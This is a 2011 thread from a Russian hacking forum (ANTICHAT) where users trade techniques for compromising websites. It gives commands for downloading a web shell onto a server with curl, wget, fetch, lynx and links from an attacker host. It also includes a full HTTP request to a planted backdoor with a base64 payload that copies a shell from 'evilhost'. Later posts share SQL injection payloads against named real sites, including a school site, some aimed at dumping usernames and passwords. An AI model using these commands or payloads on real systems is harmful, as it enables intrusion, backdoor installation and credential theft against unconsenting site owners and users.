ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

03.03.2011, 16:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
качай курлом и записывай в файл
UPD: зачем ты юзаеш этот бекдор если не знаеш что оно делает?
вариантов море, eval()+file_get_contents(), copy(),wget, sockets, php_curl, system_curl
|
|
|

03.03.2011, 16:50
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от noviyuser
noviyuser said:
какие еще команды есть напободие wget?
curl, fetch, links, lynx, get
Проверить наличие качалок можно команой which.
В консоли: which curl, если качалка установлена, то в ответ получишь /usr/bin/curl (полный путь к исполняемому файлу на сервере)
Синтаксис:
get -o /path/shell.php http://site.com/shell.txt
fetch -o /path/shell.php http://site.com/shell.txt
curl --output /path/shell.php http://site.com/shell.txt
links -source http://site.com/shell.txt > /path/shell.php
lynx -source http://site.com/shell.txt > /path/shell.php
Сообщение от None
можно ли этой командой залить полноценный шелл? можно примерчик?
Можно, зависит от настроек php.
Пример для allow_url_fopen = on (ну и функция copy разумеется не должна находиться в disable functions)
Посылаешь пакет:
Код HTML:
HTML:
POST http://site.com/backdoor.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Keep-Alive: 115
Connection: keep-alive
e=Y29weSgnaHR0cDovL2V2aWxob3N0L3NoZWxsLnR4dCcsJy9zaXRlL3d3dy9zaGVsbC5waHAnKTs
где e=copy('http://evilhost/shell.txt','/site/www/shell.php'); в base64_encode
http://evilhost/shell.txt - откуда льем
/site/www/shell.php - куда (абсолютный путь до папки доступной на запись)
|
|
|

03.03.2011, 16:55
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
тама очень просто с курлом
Код:
Code:
curl http://evilhost/shell.php > /home/www/public_html/shell.php
|
|
|

04.03.2011, 00:26
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Помогите обойти фильтрацию.
http://www.footballfoundation.org/news.php?id=2194/**/union/**/select/**/1,2,3,4,5,6,7+--+
|
|
|

04.03.2011, 01:03
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
пост наше щастье
|
|
|

04.03.2011, 03:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 28895
Репутация:
4
|
|
Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
|
|
|
|

04.03.2011, 03:53
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме: 5386281
Репутация:
1177
|
|
Сообщение от Lijzer
Lijzer said:
Ребят конечно это не вопрос, но прошу помощи ... Нужны линки на книги по sql иньекциям, чтобы бы было разжевано от а до я ... желательно дб оракл и мускул, девтеева пдфки читал и ачат все явно устарело ... Не пинайте сильно.
Эм... Способ эксплуатации SQL-inject'a не изменился и не думаю, что измениться. А если хочешь разобраться хорошо в разных SQL-языках, то читай книги по этим языкам и все. А для всего остального шпаргалки\статьи, которые есть на широких просторах интернета и в т.ч. на этом форуме.
|
|
|

04.03.2011, 17:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 1822
Репутация:
0
|
|
Помогите разобраться с sql-иньекциями.
С помощью сканера из этого топика нашел 10 уязвимостей на нужном мне сайте, большинство из них sql. Сам сканер в качестве уязвимой ссылки выдает что-то оканчивающееся на 0'+'1'=2. Пробовал подставлять вместо этого различные эксплоиты и просто кавычку, но показывается обычная страница, без всяких ошибок.
Собственно интересно, сканер врет или я что-то не то делаю... Как можно проверить на sql уязвимость кроме кавычки?
|
|
|
|

04.03.2011, 17:24
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме: 866555
Репутация:
226
|
|
как говорил конки, спроси у сканера
а если по теме то https://forum.antichat.net/thread19844.html
|
|
|

04.03.2011, 18:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 1822
Репутация:
0
|
|
Судя по первому абзацу все-же сканер врет...
Сайт нагуглил по версии джумлы, вот линки на предполагаемые уязвимости
liceum9.ru/index.php?option=com_comprofiler&task=userProfile& user=1+and+1=2 юзеры начинаются с id 121, для их просмотра пришлось зарегится.
http://www.liceum9.ru/index.php?option=com_content&task=blogcategory&id= 60&Itemid=%2099999%20union%20select%201,concat_ws% 280x3a,username,password%29,%203,4,5%20from%20jos_ users/*
http://www.liceum9.ru/index.php?option=com_banners&task=archivesection&i d='0'+and+'1'='2
В последнем вообще валидный id подобрать не смог...
Проверьте, пожалуйста, эти ссылки на sql-уязвимость. Очень хочется, чтобы первый блин не вышел комом.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|